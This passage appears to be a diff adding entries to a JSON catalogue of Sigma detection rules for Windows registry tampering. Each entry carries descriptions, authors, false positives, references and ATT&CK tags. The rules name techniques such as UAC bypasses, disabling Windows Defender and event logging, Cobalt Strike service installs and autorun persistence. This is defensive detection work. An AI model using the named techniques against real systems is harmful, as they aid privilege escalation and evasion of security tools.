"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "value": "Wow6432Node CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", + "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "meta": { + "author": "frack113", + "creation_date": "2022/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_blackbyte_ransomware.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry" + }, + { + "description": "Bypasses User Account Control using a fileless method", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_delegateexecute.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "value": "Bypass UAC Using DelegateExecute" + }, + { + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "meta": { + "author": "frack113", + "creation_date": "2022/01/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_eventviewer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "value": "Bypass UAC Using Event Viewer" + }, + { + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "meta": { + "author": "frack113", + "creation_date": "2022/01/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", + "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", + "value": "Bypass UAC Using SilentCleanup Task" + }, + { + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_change_rdp_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", + "value": "Changing RDP Port to Non Standard Number" + }, + { + "description": "Hides the file extension through modification of the registry", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_change_security_zones.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", + "value": "IE Change Domain Zone" + }, + { + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "meta": { + "author": "B.Talebi", + "creation_date": "2022/07/28", + "falsepositive": [ + "Legitimate driver altitude change to hide sysmon" + ], + "filename": "registry_set_change_sysmon_driver_altitude.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", + "https://youtu.be/zSihR3lTf7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "value": "Disable Sysmon Event Logging Via Registry" + }, + { + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "meta": { + "author": "frack113", + "creation_date": "2022/09/17", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_change_winevt_channelaccess.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "value": "Change Winevt Event Access Permission Via Registry" + }, + { + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chm_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chm_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "value": "CHM Helper DLL Persistence" + }, + { + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_chrome_extension.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1133" + ] + }, + "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", + "value": "CobaltStrike Service Installations in Registry" + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "meta": { + "author": "Omkar Gudhate", + "creation_date": "2020/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_comhijack_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ] + }, + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt" + }, + { + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2022/02/24", + "falsepositive": [ + "Legitimate disabling of crashdumps" + ], + "filename": "registry_set_crashdump_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" + ], + "tags": [ + "attack.t1564", + "attack.t1112" + ] + }, + "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "value": "CrashControl CrashDump Disabled" + }, + { + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_susp_folder.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "value": "Service Binary in Suspicious Folder" + }, + { + "description": "Detect the creation of a service with a service binary located in a uncommon directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_uncommon_folder.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "277dc340-0540-42e7-8efb-5ff460045e07", + "value": "Service Binary in Uncommon Folder" + }, + { + "description": "Detects the abuse of custom file open handler, executing powershell", + "meta": { + "author": "CD_R0M_", + "creation_date": "2022/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "value": "Custom File Open Handler Executes PowerShell" + }, + { + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "meta": { + "author": "EagleEye Team, Florian Roth, NVISO", + "creation_date": "2020/05/13", + "falsepositive": [ + "New printer port install on host" + ], + "filename": "registry_set_cve_2020_1048_new_printer_port.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "value": "Suspicious New Printer Ports in Registry (CVE-2020-1048)" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "meta": { + "author": "Sittikorn S, frack113", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "32b5db62-cb5f-4266-9639-0fa48376ac00", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits" + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2020/05/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] + }, + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "frack113", + "creation_date": "2022/08/07", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_dbgmanageddebugger_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574" + ] + }, + "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "value": "Add Debugger Entry To DbgManagedDebugger For Persistence" + }, + { + "description": "Detects the Setting of Windows Defender Exclusions", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/07/06", + "falsepositive": [ + "Administrator actions" + ], + "filename": "registry_set_defender_exclusions.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_nullbind/status/1204923340810543109", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "value": "Windows Defender Exclusions Added - Registry" + }, + { + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/05/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_dhcp_calloutdll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "value": "DHCP Callout DLL Installation" + }, + { + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "value": "Disable Exploit Guard Network Protection on Windows Defender" + }, + { + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/04", + "falsepositive": [ + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + ], + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "value": "Disabled Windows Defender Eventlog" + }, + { + "description": "Detects disabling Windows Defender PUA protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "value": "Disable PUA Protection on Windows Defender" + }, + { + "description": "Detects disabling Windows Defender Tamper Protection", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "93d298a1-d28f-47f1-a468-d971e7796679", + "value": "Disable Tamper Protection on Windows Defender" + }, + { + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_administrative_share.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "value": "Disable Administrative Share Creation at Startup" + }, + { + "description": "Detects tampering of autologger trace sessions which is a technique used by attackers to disable logging", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_autologger_sessions.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "value": "AutoLogger Sessions Tamper" + }, + { + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_defender_firewall.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "value": "Disable Microsoft Defender Firewall via Registry" + }, + { + "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", + "value": "Disable Internal Tools or Feature in Registry" + }, + { + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_macroruntimescanscope.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "value": "Disable Macro Runtime Scan Scope" + }, + { + "description": "Disable Microsoft Office Security Features by registry", + "meta": { + "author": "frack113", + "creation_date": "2021/06/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disable_microsoft_office_security_features.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", + 